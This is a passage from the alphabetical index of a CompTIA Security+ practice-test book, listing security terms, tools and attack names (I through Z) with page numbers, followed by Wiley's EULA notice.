intrusiondetectionsystem(IDS),2,13,49–50,52,58,117,139,174,186,193,215,216,221,227,241,250,261,272,291

intrusionpreventionsystem(IPS),38,52,113,165,188,209–210,211,216,227,241,253,258,261,279,286,291

intrusivescan,17,19,195,196

invoicescams,25,200

IPaddresses,70,216,229,240,250,266

IPspoofing,20,23,44,197,199,212

IPFIX,156,282

IPSec,88,143,239,241,263,274

iptables,273

irisscans,62,223

ISA/IECstandards,46,212

ISO27002,161,282

ISO27017,161,282

ITprocess,277

J

jailbreaking,104,252

jammingattack,2,186

jobrotationpolicy,161,164,166,169,179,283,284–285,286,288–289,294

JohntheRipper,149,278

journalctltool,155,156,281,282


jumpboxes,253

jurisdictionalboundaries,149,278

K

Kerberos,60,102,103,106,107,109,116,222,250,251,252,254,260

keydistributioncenter(KDC),116,260

keyescrow,108,254

keylength,231

keyreuse,72,73,230,232

keystretching,48,214,236

keylogger,13,193

keys,214

knowledge-basedauthentication,242

knownenvironmenttest,7–8,17,24,25,31,190,195,200,201,204

L

lateralmovement,15,194

leastconnection-basedloadbalancing,85,239

leastprivilege,161,282

legacysystems,33–34,206,291

legalhold,280

lighting,asadeterrent,74,232

LightweightDirectoryAccessProtocol(LDAP),29,56,80,96,203,219,236,246,255

LightweightExtensibleAuthenticationProtocol(LEAP),104,237,251

Linuxkernel,232

Linuxprivilege,207

loadbalancing,102,247,250

locks,69,70,162,181,229,283,296


logaggregation,4,187,196

loggerutility,273

logging,199

logicbomb,2,9,10,14,16,18,19,22,27,28,186,190,191,194,195,196,199,201,202

loopprotection,123,264

low-powerdevices,70–71,229–230

M

machinelearning(ML),207,210

macrovirus,9,17,190,195

malware,8,26,27,186,189,190,191,194,195,196,201,212,237–238,282

managedsecurityserviceproviders(MSSPs),227

mandatoryaccesscontrol(MAC),14,111,114,193,233,257,259,281,294

mandatoryvacationpolicy,161,162,283

man-in-the-browserattack,26,201

mantrap,219

mappingnetworks,271

masking,74,78,232,235

MD5,80,236,269

meantimebetweenfailures(MTBF),168,169,171,172,288,289,290

meantimetorepair(MTTR),168,169,171,288,289,290

measuredboot,259

media,burning,236

MediaAccessControl(MAC),188

memdumptool,273

memorandumofunderstanding(MOU),162,176,179,183,283–284,292,294,297


memoryexhaustion,202

memoryleaks,22,199,201,202,231

Metasploit,146,276

MFPs,222

microcontroller,214

microservicearchitectures,222

MicrosoftOffice,277

misconfiguration,192

mistcomputing,74,232

MITREATT&CKframework,132,267

mobileapplicationmanagement(MAM),264

mobiledevicemanagement(MDM),82–83,113,116,117,124,237,258,260,265,272,275

motionactivation,71,230

motiondetection,69,228

motionrecognition,58,221

multifactorauthentication,5,78,188,235,262

multipartitevirus,27,201

multipartyrisk,183,297

MultipurposeInternetMailExtensions(MIME)sniffing,82,237

MXrecords,270

N

namingconventions,224

NationalInstituteofStandardsandTechnology(NIST),180–181,295

NationalSecurityAgency(NSA),150,174,278,291,297

nation-stateactors,19,196,197

naturaldisasters,76,233


Near-FieldCommunication(NFC),23,103,199,251

Nessus,134–135,146,269,276

netusercommand,262

netcatcommand,137,270

NetFlow,134,269,271

netstatcommand,133,153,156,268,280,282

networkaddresstranslation(NAT),102,118,250,261

networkattachedstorage(NAS),46,62,213,223

networkflows,269,271

networkinterfacecards(NICs),229

networkintrusiondetectionsystem(NIDS),67,227

networkintrusionpreventionsystem(NIPS),52,67,216–217,227,249

networkloadbalancers,77,234

networklocation,213

networktaps,248

NetworkTimeProtocol(NTP),240,251

network-basedintrusionpreventionsystem(NIPS),100,248

NewTechnologyLANManager(NTLM),102,109,250,254

next-generationfirewalls(NGFWs),111–112,256,257,264

NICteaming,70,229

NIST800-12,282

NIST800-14,282

nmaptool,133,268

nondisclosureagreement(NDA),162,179,183,283,286,294,297

nonintrusivescan,19,196

normalization,56,219,226

NorthAmericanElectricReliabilityCorporation(NERC),46,212


NULLpointer,3,187

NXLog,150,156,278,282

O

OATH-HOTP,238

OAuth,60,80,107,110,222,236,253,255,263

objectdetection,69,228

offboarding,164,170,193,284–285,289,297

offsitestorage,224

onboarding,162,164,166,170,283,284–285,286,289

OneTimePassword(OTP),238

OnlineCertificateStatusProtocol(OCSP),89,239,241

on-path(man-in-the-middle)attack,25,26,28,201,202

on-premisescloudcomputing,235

on-premisesnetworks,217

opensourcefirewalls,265

opensourceintelligence(OSINT),4,16,29,31,32,187,189,195,203,205

OpenWebApplicationSecurityProject(OWASP),46,211,212

OpenID,56,60,100,107,109,110,219,222,248,253,254,255,263

OpenPGP,238

OpenSSL,275

opensslcommand,269

OpenVASscanner,42,211

operatingsystem(OS)threats,114–115,215,259

operationalsecurity(OPSEC),29,203

operationaltechnology(OT),35–36,198,207–208

orderofvolatility,273–274

originalequipmentmanufacturer(OEM),72,231


out-of-band(OOB)management,108,253

over-the-air(OTA),123,264

P

packetcapture,4,187

parkingpolicy,164,285

partiallyknownenvironmenttest,195,201

passivereconnaissance,29,189,203

pass-the-hashattack,24,191,200

PasswordAuthenticationProtocol(PAP),103,251

passwordcracker,275,278

passwordhashing,247

passwordhistory,262

passwordmanagers,248

passwordspraying,19,197

passwordvaults,248

passwords

aging,263

complexityof,258

storing,142,208,274

patching,95,174,246,281,291

pathping,276

PaymentCardIndustryDataSecurityStandard(PCI-DSS),162,171,175,283,290,292

PBKDF2algorithm,236

penetrationtests,5,28,37,68,188,191,196,199,202,205,209,227–228

pepper,3,186

perfectforwardsecrecy(PFS),49,214


permissions

auditing,257

setting,35,207

permissionscreep,3,187

personalidentificationnumber(PIN),241

PersonalInformationExchange(PFX),87–88,240–241

personallyidentifiableinformation(PII),235,291

personnelcredentialpolicy,293

-pflag,267

pharmingattacks,19,197

phishing,2,6,9,13,23,25,27,28,36,186,189,191,193,199,200,202,208,217

picturepasswords,47,213

piecharts,31,205

pingcommand,271

pivot,8,190

plain-textpasswordattack,10,191

platformasaservice(PaaS),54,58,64,73,78,218,221,225,232,235

playbooks,142,154,274,276,281

point-to-multipointtopology,248

point-to-pointtopology,248

policies,283,285,289,294

polymorphicvirus,198

POP3,85,239

portscans,211,270

portsecurity,83,238,248

Postgresserver,194


potentiallyunwantedprograms(PUPs),14,21,29,193,198,203

powerdistributionunit(PDU),75,226,233,247

PowerShell,23,40,199,211,222

predictiveanalysis,4,187,210

prepending,20,33,37,197,206,209

preproductionenvironments,216

presharedkey(PSK),100,244–245,248

pretexting,16,33,195,206

preventivecontrols,166,167,286,287

primefactorizationalgorithms,50,215

PrivacyEnhancedMail(PEM)files,126,240–241,266

privacynotices,184,296,297

privatecloud,65,78,225,235

privatekeys,48,49,214,247,280

privilegecreep,80,236

privilegeescalation,13,15,20,34,193,194,197,206–207

privilegescan,195

privilegedaccessmanagement(PAM),265

productionserver,51,216

proprietarydata,285,293

proprietaryintelligence,32,205

protectedcabledistribution,77,234

ProtectedExtensibleAuthenticationProtocol(PEAP),94,237,245

protocols,212

provenance,151,275,279

proximitycardreaders,75,233

PRTG,274


pseudonymization,171–172,290

publiccloud,64,65,225

publickeyinfrastructure(PKI),256,264

publickeys,48,49,214,247

purpleteams,4–5,22,30,188,199,204

pushnotifications,82–83,237

Python,17,195

Q

qualitativeriskassessment,162,165,174–175,283,285,291

qualityassurance(QA),216

quantitativeriskassessment,162,165,168,174–175,283,285,288,291

quantumcomputing,72,231

quantumcryptography,215

quantumencryption,50,215

quarantineprocess,153,272,280

Qubits,215

quickformatting,148,277

R

raceconditions,14,23,194,199

radiofrequencyidentifier(RFID),11,23,27,75,96,192,199,202,233,246

RAID,55,56,71,218,219,230

rainbowtables,9,12,21,191,193,198,203,298

ransomware,22,199

RaspberryPi,48,214

ratelimiting,246

rebooting,276


reconnaissancephase,ofpenetrationtesting,37,209

recovery,131,267

recoverypointobjective(RPO),169,289

recoverytimeobjective(RTO),166,177,287,292

RedHat,270

redteams,4–5,22,24,30,188,199,200,204

refactoring,8,36,190,208

registrationauthority(RA),239

remoteaccess,246

RemoteAuthenticationDial-inUserService(RADIUS),56,100,219,231,246,248

remoteregistry,254

remotewipe,82–83,237,252

remote-accessTrojan(RAT),10,14,17,21,29,32,191,193,195,198,203,205

replayattack,25,29,201,203

reputationalgains,210

requestsforcomments(RFCs),63,224

resourceconstraints,234

resourcepolicies,54,218

resource-basedpolicies,98,247

restorationorder,213

retentionpolicies,138,271

retinascans,62,223

reverseproxy,112,114,125,127,257,266

reverseshell,205

-Rflag,272

right-to-auditclauses,280


riskacceptance,163,166,167,168,284,287,288

riskavoidance,163,166,167,168,284,287,288

riskheatmaps,174–175,291

riskmitigation,163,166,167,168,182,284,287,288,297

riskregister,166,171,287,290

risktransfer,163,166,167,168,284,287,288

robocalling,28,202

rogueaccesspoint,3,11,186,192

role-basedaccesscontrol(RBAC),110,111,114,255,257,259

rootcertificate,249

rootgrabbing,13,193

RootGuard,240

rootkit,2,9,10,13,14,19,22,27,186,190,191,193,194,196,199,201,202

routecommand,268

RSAkey,49,214

RSH,16,195

RTO,50,215

RTOS,61,223

ruleofengagement,forpenetrationtests,32,205

rule-basedaccesscontrol,255

S

salts,3,49,79,186,214,223,235

sandboxing,53,54,217,218,244

scalability,incloudcomputing,56,226

scanlesstool,136,270

scarcity,5,16,188,194

scriptkiddies,6,18,33,189,196,205


scripting,65,225

scryptalgorithm,236

secretsmanagementservices,102,250

securecookies,241

secureIMAPs,247

SecureLightweightDirectoryAccessProtocol(LDAPS),115,259

SecurePOP3,84,238

SecureShell(SSH),43,86,97,98,195,212,238,240,247,253,278

SecureSocketsLayer(SSL),31,67,204,220,227

Secure/MultipurposeInternetMailExtensions(S/MIME),84,238

SecurityAccountManager(SAM)file,204

SecurityAssertionMarkupLanguage(SAML),56,60,80,102,116,219,222,236,250,253,255,260,263

securityaudits,5,188

SecurityEnhancedLinus(SELinux),265

securitygroups,117,261

securityguard,59,69,221,229

securityinformationandeventmanagement(SIEM)device,4,31,72,187–188,204,205,210,231,249

securitymonitoring,187–188

securityorchestration,automation,andresponse(SOAR),8,31,39,190,204,210

securityzones,90,242–243

segmentation,150,151,255,275,278,279

segmentationfault,187

self-encryptingdrive(SED),52,63,217,224

self-signedcertificate,87,240

sensorappliances,247


sensors,272

separationofduties,166,169,179,286,288–289,294

serverlessarchitectures,58,221

server-siderequestforgery(SSRF),7,36,189,208

serviceaccounts,251,293

servicelevelagreement(SLA),162,176,179,283–284,286,292,294

serviceorganizationreport(SOC),39,210

ServiceSetIdentifiers(SSIDs),246

sessionhijacking,3,12,13,18,26,186,192,193,196,201

sessionIDs,211

SessionInitiationProtocol(SIP),239,270,278

sessionpersistence,253

sFlow,269,271

SFTP,195

SHA1algorithm,80,236,269

shimming,8,24,190,200

ShivaPasswordAuthenticationProtocol(SPAP),103,251

shortmessageservice(SMS)messages,69,217,228

shouldersurfing,25,28,33,200,202,206

signage,68,228

silentpatching,36,208

SimpleNetworkManagementProtocol(SNMP),98,120,126,247,252,263,266,274

simulation,272

simultaneousauthenticationofequals(SAE),243

singlelossexpectancy(SLE),163,284,295

singlepointoffailure(SPOF),168,176,288,292


SingleSign-On(SSO),113,255,258

sitesurvey,237

skimmer,29,203

smartcards,68,69,227,229,238

smishing,27,189,202

SMSpushes,234

Smurfattack,25,200

snapshots,54,65,218,225

SOC2engagement,294

socialengineering,9,16,24,187,191,194,195,200,206

sociallogin,73,231

socialmediainfluencecampaigns,18,196

socialproof,194

software

compiling,63,224

updatesfor,202

softwareasaservice(SaaS),54,58,73,218,221,232

softwarefirewall,103,251

software-definednetworking(SDN),52,55,59,67,217,218,221,227

sourcecode,290

SourceForge,40,210

spam,6,189

sparseinfectorvirus,195

spearphishing,2,9,28,186,189,191,202

SPIM,3,187

splithorizonDNS,99,248

split-tunnelVPNs,123,264


spyware,14,193,198

SQLinjection,2,3,10,20,22,51,57,186,189,191,197,198,216,220,245,280

SRTP,238

SSHFileTransferProtocol(SFTP),252

stagingenvironments,51,216

stagingserver,53,217

stakeholdermanagement,133,138,268,271

standards,224

stateactors,18,196

statelaws,294

statefulinspectionfirewall,91,243

statefulpacketinspection(SPI),91,243

statelessfirewall,255

StatementofStandardsforAttestationEngagements(SSAEs),290

staticcodes,230,245,247,252

storageareanetwork(SAN),54,62,218,223

storedprocedures,66,220,226

stormcontrol,257

streamciphers,192

stringinjection,243

stringscommand,136,270

StructuredQueryLanguage(SQL),203

StructuredThreatIntelligenceExchange(STIX)protocol,23,29,199,203

SubjectAlternateName(SAN),246

subnetmask,46,212

subscriberidentitymodule(SIM),234


subscriptionservices,241

SupervisoryControlandDataAcquisition(SCADA)system,52,67,215,216–217,227

supplychainrisk,291

swapfiles,34,206–207,273

symmetriccryptography,71,230

symmetricencryption,49,53–54,214,218

SYNflood,33,206,243

syslog,38,152,156,209,279,282

systemcrashfile,274

systemdumpfile,274

systemonachip(SoC),224

systemrestorepoint,68,228

T

tabletopexercises,267

taggingdrives,279

tailcommand,269

tailgating,23,39,199,210

tapebackups,62,223

TAXII,23,199

TCPhandshakes,4,187

TCPport23,34,206

TCPport443,43,212

tcpdump,267

tcpreplaytool,279

technicalcontrols,286

Telnet,16,43,195,206,212


TerminalAccessControllerAccessControlSystemPlus(TACACS+),116,260

terminateandstayresident(TSR),220

testserver,51,216

testing,284

theHarvester,132,267

third-partycode,risksof,59,222

third-partycredentialpolicies,295

third-partyrisks,210

third-partysecuredestructioncompanies,47,213

threatactors,207

threatassessment,165,285

threathunting,37,208

threatintelligence,205

threatmaps,31,205

threatvectors,40,210

thumbdrives,71,230

time-basedone-timepassword(TOTP),69,228

timeboxing,249–250

timelines,building,277

time-to-live(TTL),137–138,271

TLSinspection,56,220

tokenization,74,101,180,232,249,295,296

tokens,77,78,110,235,255

Tor,30,203

TOTP,238

tracertcommand,143,147,274,276

traffic,stopping,244


training,284,292

transitgateways,53,217

TransportLayerSecurity(TLS),67,86,90,103,104,105,108,193,227,239,240,242,251,252,253

trends,281

Trojanhorse,2,8,9,14,17,19,21,27,28,31,34,44,186,190,193,194,195,196,198,199,201,202,204,206–207,212

trustedboot,259

TrustedFoundry,31,46,205,212

TrustedPlatformModule(TPM),55,63,90,115,218,224,226,242,244,249,250,259,264

trust/trusting,24,200,210,244

two-factorauthentication,219

two-personcontrolschemes,73,231

typosquatting,6,44,188–189,212

U

UEFISecureBoot,263

unifiedendpointmanagement(UEM),116,260

UnifiedExtensibleFirmwareInterface(UEFI),115,254,259,261,263

unifiedthreatmanagement(UTM),258

uniformresourcelocator(URL)

URLfilter,154,281

URLredirection,26,30,201,204

URLshortening,204

uninterruptiblepowersupply(UPS),66,75,226,233,247

universalendpointmanagement(UEM),125,265

unknownenvironmenttest,7–8,24,25,31,190,195,200,201,204

unmannedaerialvehicles(UAVs),76,233


urgency,24,200

U.S.DepartmentofAgriculture(USDA),150,278

USBdatablockers,73,231

useraccounts,258

userbehavioranalysis,187

V

vendordiversity,46,213,237–238

vendorsupport,7,9,189,191

versionnumbering,67,227

verticalmovement,15,194

-vflag,280

VirtualDesktopInfrastructure(VDI),94,222,245

virtualfirewall,103,251,261

virtualIP(VIP),247

virtualLAN(VLAN),90,242–243,260

virtualmachine(VM)

escapeattacks,57,58,66,220,226

forensics,278

sprawl,57,66,220,226

virtualprivateclouds(VPCs),217,261

virtualprivatenetwork(VPN),86,90,95,240,242,245,250

virtualization,220

virus,28,202

vishing,28,53,202,217,239

VisualBasicforApplication(VBA)script,195

VoiceoverInternetProtocol(VoIP),77,234

Volatilityframework,279


vulnerabilityassessment,30,162,204,283

vulnerabilityscans,5,25,43,188,200,211,212

W

wardialing,28,86,202,207,239

wardriving,16,195

warflying,16,33,195,206

warwalking,195,207

warmsite,50,68,215,228

wateringholeattacks,18,29,33,37,196,203,206,209

wearables,228

webapplicationfirewall(WAF),52,103,154,186,211,216,251,281

webpagetitles,270

webproxy,250,252

whaling,9,22,37,191,199,209

whiteteams,4–5,22,30,35,188,199,204,207

white-boxtest,190,200,201,203,204

whitelisting,91,243

Wi-Fihotspots,190

Wi-Finetworks,252

Wi-FiProtectedSetup(WPS),2,88,186,192,241

wildcardcertificate,87,240

WindowsDefenderFirewall,148,277

WinHex,274

wirelessaccesspoint(WAP),2,3,186

wirelessnetworkheatmaps,91–92,243

wirelessrouters,204

Wireshark,136,137,138,152,270,271,278,279


worms,13,23,28,29,193,199,202,203

WPA,92,113,120,124,243,258,262,265

X

XaaS,68,228

XMLinjection,209

Z

zero-daydisclosure,35,207

zero-dayexploits,20,191,197

zero-knowledgetest,190

zero-trustenvironment,260

zero-wiping,271

Zigbee,61,223


WILEYENDUSERLICENSEAGREEMENTGotowww.wiley.com/go/eulatoaccessWiley’sebookEULA.


http://www.wiley.com/go/eula

comptia security+ practice tests - dl1.newoutlook.it

Documents